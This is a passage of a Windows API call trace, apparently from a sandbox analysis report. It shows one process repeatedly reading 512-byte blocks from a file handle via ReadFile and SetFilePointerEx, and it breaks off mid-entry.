[0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.239] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.239] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.239] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.240] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.240] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.240] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.241] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.241] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.241] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.242] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.242] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.242] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.243] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.243] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.243] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.244] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.244] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.244] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.245] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.245] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.245] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.246] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.246] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.246] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, lpBuffer=0x26f274, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26e464, lpOverlapped=0x0 | out: lpBuffer=0x26f274*, lpNumberOfBytesRead=0x26e464*=0x200, lpOverlapped=0x0) returned 1 [0094.247] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26e444 | out: lpNewFilePointer=0x0) returned 1 [0094.247] _get_osfhandle (_FileHandle=4) returned 0x54 [0094.247] ReadFile (in: hFile=0x54, 